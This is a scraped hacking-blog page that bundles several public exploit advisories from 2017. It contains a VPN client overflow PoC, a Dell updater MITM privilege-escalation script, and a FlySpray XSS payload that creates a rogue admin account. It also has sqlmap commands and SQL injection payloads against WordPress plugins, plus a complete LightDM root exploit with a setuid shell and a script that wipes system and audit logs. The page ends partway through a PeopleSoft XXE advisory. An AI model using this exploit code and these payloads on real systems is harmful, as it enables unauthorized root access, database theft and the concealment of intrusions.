#!/usr/bin/python
# Exploit Title : Private Tunnel VPN Client 2.8 - Local Buffer Overflow (SEH)
# Date : 25/04/2017
# Exploit Author : Muhann4d
# Vendor Homepage : https://www.privatetunnel.com
# Software Link : https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
# Affected Versions : 2.8 & 2.7
# Category : Denial of Service (DoS) Local
# Tested on OS : Windows 7 SP1 32bit 64bit
# Proof of Concept : run the exploit, copy the contents of poc.txt, paste it in the password field and press Login.
junkA = "\x41" * 1996
nSEH = "\x42" * 4
SEH = "\x43" * 4
junkD = "\x44" * 9000
f = open ("poc.txt", "w")
f.write(junkA + nSEH + SEH + junkD)
f.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863532677
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Dell Customer Connect 1.3.28.0 Privilege Escalation
# Date: 25.04.2017
# Software Link: http://www.dell.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
1. Description
DCCService.exe is running on autostart as System.
This service has auto update functionality.
Basically it periodically checks https://otbs.azurewebsites.net looking for new config file.
Under normal conditions we cannot spoof this connection because it’s SSL.
But here WebUtils.sendWebRequest() is executed using Impersonator.RunImpersonated().
RunImpersonated() executes given function in the context of currently logged in user.
In Windows system we can add any certificate to Local user root store.
Then this certificate is considered as trusted so we can perform MITM attack.
It can be done using simple proxy server because by default .NET HttpWebRequest() uses IE proxy settings (which can by set by any user without administrator priveleges).
https://security.szurek.pl/dell-customer-connect-13280-privilege-escalation.html
2. Proof of Concept
from _winreg import *
from threading import Thread
import os
import subprocess
import hashlib
import SimpleHTTPServer
import SocketServer
import ssl
import httplib
import time
msi_file = "exploit.msi"
cert_file = "otbs.crt"
signing_file = "code.cer"
file_port = 5555
proxy_port = 7777
print "Dell Customer Connect 1.3.28.0 Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
# Simpe SSL proxy based on https://code.google.com/archive/p/proxpy/
class ProxyHandler(SocketServer.StreamRequestHandler):
def __init__(self, request, client_address, server):
SocketServer.StreamRequestHandler.__init__(self, request, client_address, server)
def handle(self):
global xml
line = self.rfile.readline()
for l in self.rfile:
if l == "\r\n":
break
if "GET /api/AppConfig" in line:
conn = httplib.HTTPSConnection(self.host, self.port)
print "\n[+] Send XML to service"
self.wfile.write("HTTP/1.1 200 200\r\n\r\n"+xml)
elif "CONNECT otbs.azurewebsites.net:443" in line:
socket_ssl = ssl.wrap_socket(self.request, server_side = True, certfile = cert_file, ssl_version = ssl.PROTOCOL_SSLv23, do_handshake_on_connect = False)
self.request.send("HTTP/1.1 200 Connection Established\r\n\r\n")
host, port = self.request.getpeername()
self.host = host
self.port = port
while True:
try:
socket_ssl.do_handshake()
break
except (ssl.SSLError, IOError):
return
print "\n[+] SSL Established with otbs.azurewebsites.net"
self.request = socket_ssl
self.setup()
self.handle()
class ThreadedHTTPProxyServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def add_to_store(name, file):
output = subprocess.Popen('certutil -user -addstore "Root" "{}"'.format(file), stdout=subprocess.PIPE).communicate()[0]
if "\"{}\" already in store".format(name) in output:
print "[+] Certificate {} already in store".format(name)
elif "\"{}\" added to store".format(name) in output:
print "[+] Add certificate {} to user root store".format(name)
else:
print "[-] You need to click OK in order to add cert to user root store"
os._exit(0)
if not os.path.isfile(cert_file):
print "[-] Missing SSL file"
os._exit(0)
if not os.path.isfile(signing_file):
print "[-] Missing code signing file"
os._exit(0)
add_to_store("otbs.azurewebsites.net", cert_file)
add_to_store("dell inc", signing_file)
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def file_server():
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", file_port), Handler)
httpd.serve_forever()
if not os.path.isfile(msi_file):
print "[-] Missing msi file"
os._exit(0)
sha256 = sha256_checksum(msi_file)
print "[+] MSI hash: {}".format(sha256)
print "[+] Set Proxy Server in registry"
key = OpenKey(HKEY_CURRENT_USER, r'Software\Microsoft\Windows\CurrentVersion\Internet Settings', 0, KEY_ALL_ACCESS)
SetValueEx(key, "ProxyServer", 0, REG_SZ, "127.0.0.1:{}".format(proxy_port))
SetValueEx(key, "ProxyEnable", 0, REG_DWORD, 1)
CloseKey(key)
print "[+] Start file server on port {}".format(file_port)
t1 = Thread(target = file_server)
t1.daemon = True
t1.start()
xml = "<UpdateResponse xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><LatestVersion>9.0.0.6</LatestVersion><UpgradeUrl>http://localhost:{}/{}</UpgradeUrl><UpgradeHash>{}</UpgradeHash><SurveyCheckInterval>1</SurveyCheckInterval></UpdateResponse>".format(file_port, msi_file, sha256)
print "[+] Start proxy server on port {}".format(proxy_port)
proxy_server = ThreadedHTTPProxyServer(("127.0.0.1", proxy_port), ProxyHandler)
t2 = Thread(target = proxy_server.serve_forever)
t2.daemon = True
t2.start()
log_path = r"C:\Users\All Users\Dell\Dell Customer Connect\Logs\{}_install_log.txt".format(msi_file)
print "[+] Waiting for execution ",
while True:
if os.path.isfile(log_path):
print "\n[+] Looks like msi file was executed, exiting"
os._exit(0)
time.sleep(3)
print ".",
3. Fix
http://www.dell.com/support/home/us/en/19/Drivers/DriversDetails?driverId=DR53F
# Exploit Title: XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)
# Date: 19/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
: https://www.openoffice.org
# Version: 1.0-rc4
# Tested on: Windows 7 x64 SP1 / Kali Linux
Description :
A vulnerability has been discovered in Flyspray , which can be
exploited by malicious people to conduct cross-site scripting attacks. Input
passed via the 'real_name' parameter to '/index.php?do=myprofile' is not
properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
The script is executed on the parameter page AND on any page that allow the
user to put a comment.
This XSS vector allow to execute scripts to gather the CSRF token
and submit a form to create a new admin
Here's the script :
var tok = document.getElementsByName('csrftoken')[0].value;
var txt = '<form method="POST" id="hacked_form"
action="index.php?do=admin&area=newuser">'
txt += '<input type="hidden" name="action" value="admin.newuser"/>'
txt += '<input type="hidden" name="do" value="admin"/>'
txt += '<input type="hidden" name="area" value="newuser"/>'
txt += '<input type="hidden" name="user_name" value="hacker"/>'
txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>'
txt += '<input type="hidden" name="user_pass" value="12345678"/>'
txt += '<input type="hidden" name="user_pass2" value="12345678"/>'
txt += '<input type="hidden" name="real_name" value="root"/>'
txt += '<input type="hidden" name="email_address" value="root@root.com"/>'
txt += '<input type="hidden" name="verify_email_address" value="
root@root.com"/>'
txt += '<input type="hidden" name="jabber_id" value=""/>'
txt += '<input type="hidden" name="notify_type" value="0"/>'
txt += '<input type="hidden" name="time_zone" value="0"/>'
txt += '<input type="hidden" name="group_in" value="1"/>'
txt += '</form>'
var d1 = document.getElementById('menu');
d1.insertAdjacentHTML('afterend', txt);
document.getElementById("hacked_form").submit();
This will create a new admin account, hacker:12345678
POC video : *https://www.youtube.com/watch?v=eCf9a0QpnPs
Patch : No patch yet
# Exploit Title: KittyCatfish 2.2 Plugin for WordPress - SQL Injection
# Date: 20/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
# Version: 2.2
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The get oarameter 'kc_ad' is vulnerable.
2. Proof of concept
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0"" —dbms —threads=10 —random-agent
OR
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql —level 5 —risk=3
Parameter: kc_ad (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kc_ad=31 AND 2281=2281&ver=2.0
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.2
6. Disclosure timeline
06-Mar-2017 - found the vulnerability
06-Mar-2017 - informed the developer
20-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.
# Exploit Title: Car Rental System v2.5
# Date: 28/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: https://www.bestsoftinc.com/
# Software Link: https://www.bestsoftinc.com/car-rental-system.html
# Version: 2.5
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Car Rental System v2.5 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameters 'pickuploc', 'dropoffloc', and 'car_type' are vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-car/" —data="pickuploc=2&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=" --dbs --threads=5 --random-agent
Parameter: pickuploc (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pickuploc=2 AND 3834=3834&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pickuploc=2 AND SLEEP(5)&dropoffloc=1&car_type=&pickup=03/08/2017&pickUpTime=09:00:00&dropoff=03/18/2017&dropoffTime=09:00:00&btn_room_search=
The same is applicable for 'dropoffloc' and 'car_type' parameters
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.5
6. Disclosure timeline
13-Mar-2017 - found the vulnerability
13-Mar-2017 - informed the developer
28-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.
# Exploit Title: Wow Viral Signups v2.1 WordPress Plugin SQL Injection
# Date: 29/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-viral-signup/
# Version: 2.1
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Wow Viral Signups v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'idsignup' is vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=mwp_signup_send&email=GING%40MAIL.RU&hvost=%3Fpage_id%3D47&idsignup=1" --dbs --threads=10 --random-agent --dbms mysql
Parameter: idsignup (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND 5272=5272
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=mwp_signup_send&email=GING@MAIL.RU&hvost=?page_id=47&idsignup=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hXXu)
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.1
6. Disclosure timeline
15-Mar-2017 - found the vulnerability
15-Mar-2017 - informed the developer
29-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.
# Exploit Title: Wow Forms v2.1 WordPress Plugin SQL Injection
# Date: 29/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: http://wow-company.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.1
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Wow Forms v2.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'wowformid' is vulnerable.
2. Proof of concept
sqlmap -u "http://server/wp-admin/admin-ajax.php" --data "action=send_mwp_form&arrkey%5B%5D=mwp-field-0&arrkey%5B%5D=mwp-forms-textarea-0&arrval%5B%5D=form2&arrval%5B%5D=rrr&mwpformid=1*" --dbs --threads=10 --random-agent --dbms mysql
Parameter: Array-like #6* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND 6968=6968
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))gxQa)
Type: UNION query
Title: Generic UNION query (NULL) - 65 columns
Payload: action=send_mwp_form&arrkey[]=mwp-field-0&arrkey[]=mwp-forms-textarea-0&arrval[]=form2&arrval[]=rrr&mwpformid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x6b656f4d516d7a6b736f596f49746d4e776a7663716f4d41654c6e516e516c6c6c7a5274744a6d57,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL— -
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.
4. Impact
Critical
5. Affected versions
<= 2.1
6. Disclosure timeline
15-Mar-2017 - found the vulnerability
15-Mar-2017 - informed the developer
29-Mar-2017 - release date of this security advisory
Not fixed at the date of submitting this exploit.
Source: https://blogs.securiteam.com/index.php/archives/3134
Vulnerability Summary
The following advisory describes a local privilege escalation via LightDM
found in Ubuntu versions 16.10 / 16.04 LTS.
Ubuntu is an open source software platform that runs everywhere from IoT
devices, the smartphone, the tablet and the PC to the server and the
cloud. LightDM is an X display manager that aims to be lightweight, fast,
extensible and multi-desktop. It uses various front-ends to draw login
interfaces, also called Greeters.
Credit
An independent security researcher, G. Geshev (@munmap), has reported this
vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor Responses
The vendor has released a patch to address this issue.
For more information: https://www.ubuntu.com/usn/usn-3255-1/
CVE Details
CVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358>
Vulnerability Details
The vulnerability is found in *LightDM*, which is the Ubuntu’s default
desktop manager, more specifically in the guest login feature. By default
*LightDM* allows you to log into a session as a temporary user. This is
implemented in a script called ‘*guest-account*‘.
@ubuntu:~$ ls -l /usr/sbin/guest-account
-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account
@ubuntu:~$ dpkg -S /usr/sbin/guest-account
lightdm: /usr/sbin/guest-account
@ubuntu:~$ dpkg -s lightdm
Package: lightdm
Status: install ok installed
Priority: optional
Section: x11
Installed-Size: 672
Maintainer: Robert Ancell <robert.ancell@ubuntu.com>
Architecture: amd64
Version: 1.19.5-0ubuntu1
Provides: x-display-manager
Depends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>=
1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6
, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14),
libpam-modules, plymouth (>= 0.8.8-0ubuntu18)
Pre-Depends: dpkg (>= 1.15.7.2)
Recommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde-
greeter
Suggests: bindfs
Conflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0
Conffiles:
/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf
/etc/apparmor.d/abstractions/lightdm_chromium-browser
e1195e34922a67fa219b8b95eaf9c305
/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb
/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf
b76b6b45d7f7ff533c51d7fc02be32f4
/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188
/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e
/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e
/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9
/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22
/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf
/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9
Description: Display Manager
LightDM is a X display manager that:
* Has a lightweight codebase
* Is standards compliant (PAM, ConsoleKit, etc)
* Has a well defined interface between the server and user interface
* Cross-desktop (greeters can be written in any toolkit)
Homepage: https://launchpad.net/lightdm
@ubuntu:~$
The script runs as root when you view the login screen, also known as a
greeter, to log in as a guest. Ubuntu’s default greeter is Unity Greeter.
*Vulnerable code*
The vulnerable function is ‘*add_account*‘.
35 temp_home=$(mktemp -td guest-XXXXXX)
36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]')
37 GUEST_USER=${GUEST_HOME#/tmp/}
38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME}
The guest folder gets created using ‘mktemp’ on line 35. The attacker can
use ‘*inotify*‘ to monitor ‘*/tmp*‘ for the creation of this folder.
The folder name will likely contain both upper and lower case letters. Once
this folder is created, we grab the folder name and quickly and create the
equivalent folder with all letters lower case.
If we manage to race the ‘*mv*‘ command on line 38, we end up with the
newly created home for the guest user inside the folder we own.
Once we have the guest home under our control, we rename it and replace it
with a *symbolic link* to a folder we want to take over. The code below
will then add the new user to the OS. The user’s home folder will already
point to the folder we want to take over, for example ‘*/usr/local/sbin*‘.
68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext "Guest")
--user-group --shell /bin/bash ${GUEST_USER} || {
69 rm -rf ${GUEST_HOME}
70 exit 1
71 }
The attacker can grab the newly created user’s ID and monitor ‘
*/usr/local/sbin*‘ for ownership changes. The ownership will be changed by
the following ‘*mount*‘.
78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || {
79 rm -rf ${GUEST_HOME}
80 exit 1
81 }
We will remove the symbolic link and create a folder with the same name –
to let the guest user to log in. While the guest is logging in, his path
for finding executable files will include ‘*bin*‘ under his home folder.
That’s why we create a new symbolic link to point his ‘*bin*‘ into a folder
we control. This way we can force the user to execute our own code under
his user ID. We use this to log out the guest user from his session which
is where we can gain root access.
The logout code will first execute the following code:
156 PWENT=$(getent passwd ${GUEST_USER}) || {
157 echo "Error: invalid user ${GUEST_USER}"
158 exit 1
159 }
This code will be executed as the owner of the script, i.e. root. Since we
have already taken over ‘*/usr/local/sbin*‘ and have planted our own ‘
*getent*‘, we get to execute commands as root at this point.
Note – We can trigger the guest session creation script by entering the
following two commands.
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
switch-to-guest
Proof of Concept
The Proof of Concept is contains 9 files and they will take advantage of
the race conditions mentioned above.
1. kodek/bin/cat
2. kodek/shell.c
3. kodek/clean.sh
4. kodek/run.sh
5. kodek/stage1.sh
6. kodek/stage1local.sh
7. kodek/stage2.sh
8. kodek/boclocal.c
9. kodek/boc.c
By running the following scripts an attacker can run root commands:
@ubuntu:/var/tmp/kodek$ ./stage1local.sh
@ubuntu:/var/tmp/kodek$
[!] GAME OVER !!!
[!] count1: 2337 count2: 7278
[!] w8 1 minute and run /bin/subash
@ubuntu:/var/tmp/kodek$ /bin/subash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
If the exploit fails, you can simply run it again.
Once you get your root shell, you can optionally clean any exploit files
and logs by executing the below.
root@ubuntu:/var/tmp/kodek# ./clean.sh
/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such
file or directory
Do you want to remove exploit (y/n)?
y
/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a
directory
root@ubuntu:/var/tmp/kodek#
boc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <pwd.h>
#define EVENT_SIZE(sizeof(struct inotify_event))
#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
int main(void) {
struct stat info;
struct passwd * pw;
struct inotify_event * event;
pw = getpwnam("root");
if (pw == NULL) exit(0);
char newpath[20] = "old.";
int length = 0, i, fd, wd, count1 = 0, count2 = 0;
int a, b;
char buffer[EVENT_BUF_LEN];
fd = inotify_init();
if (fd < 0) exit(0);
wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
if (wd < 0) exit(0);
chdir("/tmp/");
while (1) {
length = read(fd, buffer, EVENT_BUF_LEN);
if (length > 0) {
event = (struct inotify_event * ) buffer;
if (event - > len) {
if (strstr(event - > name, "guest-") != NULL) {
for (i = 0; event - > name[i] != '\0'; i++) {
event - > name[i] = tolower(event - > name[i]);
}
if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
;
if (event - > mask & IN_MOVED_FROM) {
rename(event - > name, strncat(newpath, event - > name, 15));
symlink("/usr/local/sbin/", event - > name);
while (1) {
count1 = count1 + 1;
pw = getpwnam(event - > name);
if (pw != NULL) break;
}
while (1) {
count2 = count2 + 1;
stat("/usr/local/sbin/", & info);
if (info.st_uid == pw - > pw_uid) {
a = unlink(event - > name);
b = mkdir(event - > name, ACCESSPERMS);
if (a == 0 && b == 0) {
printf("\n[!] GAME OVER !!!\n[!] count1: %i count2: %i\n",
count1, count2);
} else {
printf("\n[!] a: %i b: %i\n[!] exploit failed !!!\n", a, b
);
}
system("/bin/rm -rf /tmp/old.*");
inotify_rm_watch(fd, wd);
close(fd);
exit(0);
}
}
}
}
}
}
}
}
boclocal.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <pwd.h>
#define EVENT_SIZE(sizeof(struct inotify_event))
#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
int main(void) {
struct stat info;
struct passwd * pw;
struct inotify_event * event;
pw = getpwnam("root");
if (pw == NULL) exit(0);
char newpath[20] = "old.";
int length = 0, i, fd, wd, count1 = 0, count2 = 0;
int a, b, c;
char buffer[EVENT_BUF_LEN];
fd = inotify_init();
if (fd < 0) exit(0);
wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
if (wd < 0) exit(0);
chdir("/tmp/");
while (1) {
length = read(fd, buffer, EVENT_BUF_LEN);
if (length > 0) {
event = (struct inotify_event * ) buffer;
if (event - > len) {
if (strstr(event - > name, "guest-") != NULL) {
for (i = 0; event - > name[i] != '\0'; i++) {
event - > name[i] = tolower(event - > name[i]);
}
if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
;
if (event - > mask & IN_MOVED_FROM) {
rename(event - > name, strncat(newpath, event - > name, 15));
symlink("/usr/local/sbin/", event - > name);
while (1) {
count1 = count1 + 1;
pw = getpwnam(event - > name);
if (pw != NULL) break;
}
while (1) {
count2 = count2 + 1;
stat("/usr/local/sbin/", & info);
if (info.st_uid == pw - > pw_uid) {
a = unlink(event - > name);
b = mkdir(event - > name, ACCESSPERMS);
c = symlink("/var/tmp/kodek/bin/", strncat(event - > name,
"/bin", 5));
if (a == 0 && b == 0 && c == 0) {
printf("\n[!] GAME OVER !!!\n[!] count1: %i count2:
%i\n[!] w8 1 minute and run /bin/subash\n", count1, count2);
} else {
printf("\n[!] a: %i b: %i c: %i\n[!] exploit failed
!!!\n[!] w8 1 minute and run it again\n", a, b, c);
}
system("/bin/rm -rf /tmp/old.*");
inotify_rm_watch(fd, wd);
close(fd);
exit(0);
}
}
}
}
}
}
}
}
clean.sh
#!/bin/bash
if [ "$(/usr/bin/id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
/bin/rm -rf /tmp/guest-* /tmp/old.guest-*
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern
.log /var/log/audit/audit.log /var/log/lightdm/*
/bin/echo > /var/log/auth.log
/bin/echo > /var/log/syslog
/bin/dmesg -c >/dev/null 2>&1
/bin/echo "Do you want to remove exploit (y/n)?"
read answer
if [ "$answer" == "y" ]; then
/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/*
/bin/rm -rf /var/tmp/kodek
else
exit
fi
run.sh
#!/bin/sh
/bin/cat << EOF > /usr/local/sbin/getent
#!/bin/bash
/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1
/bin/chmod 4111 /bin/subash >/dev/null 2>&1
COUNTER=0
while [ \$COUNTER -lt 10 ]; do
/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1
let COUNTER=COUNTER+1
done
/bin/sed -i 's/\/usr\/lib\/lightdm\/lightdm-guest-session
{/\/usr\/lib\/lightdm\/lightdm-guest-session flags=(complain) {/g' /etc/
apparmor.d/lightdm-guest-session >/dev/null 2>&1
/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2>
&1
/usr/bin/getent passwd "\$2"
EOF
/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1
shell.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <grp.h>
int main(void)
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
setgroups(0, NULL);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "[bioset]", "-pi", NULL);
return 0;
}
stage1.sh
#!/bin/bash
if [ "${PWD}" == "/var/tmp/kodek" ]; then
/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
/usr/bin/killall -9 boc >/dev/null 2>&1
/bin/sleep 3s
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
&1
/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc
/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
/var/tmp/boc
else
echo "[!] run me from /var/tmp/kodek"
exit
fi
stage1local.sh
#!/bin/bash
if [ "${PWD}" == "/var/tmp/kodek" ]; then
/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
/usr/bin/killall -9 boc >/dev/null 2>&1
/bin/sleep 3s
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
&1
/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc
/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
/var/tmp/boc &
/bin/sleep 5s
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
switch-to-guest
else
echo "[!] run me from /var/tmp/kodek"
exit
fi
stage2.sh
#!/bin/sh
/usr/bin/systemd-run --user /var/tmp/run.sh
/bin/cat
#!/bin/sh
/usr/bin/systemd-run --user /var/tmp/run.sh
/bin/sleep 15s
/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/
head -1 | /usr/bin/awk '{ print $1 }'`
Application: Oracle PeopleSoft
Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55
Vendor URL: http://oracle.com
Bug: XXE
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Nadya Krivdyuk (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-020] XXE VIA DOCTYPE in PeopleSoft
PeopleSoftServiceListeningConnector
Advisory ID: [ERPSCAN-17-020]
Risk: high
CVE: CVE-2017-3548
Advisory URL: https://erpscan.com/advisories/erpscan-17-020-xxe-via-doctype-peoplesoft/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XXE
Impact: File disclosure, network discovery
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
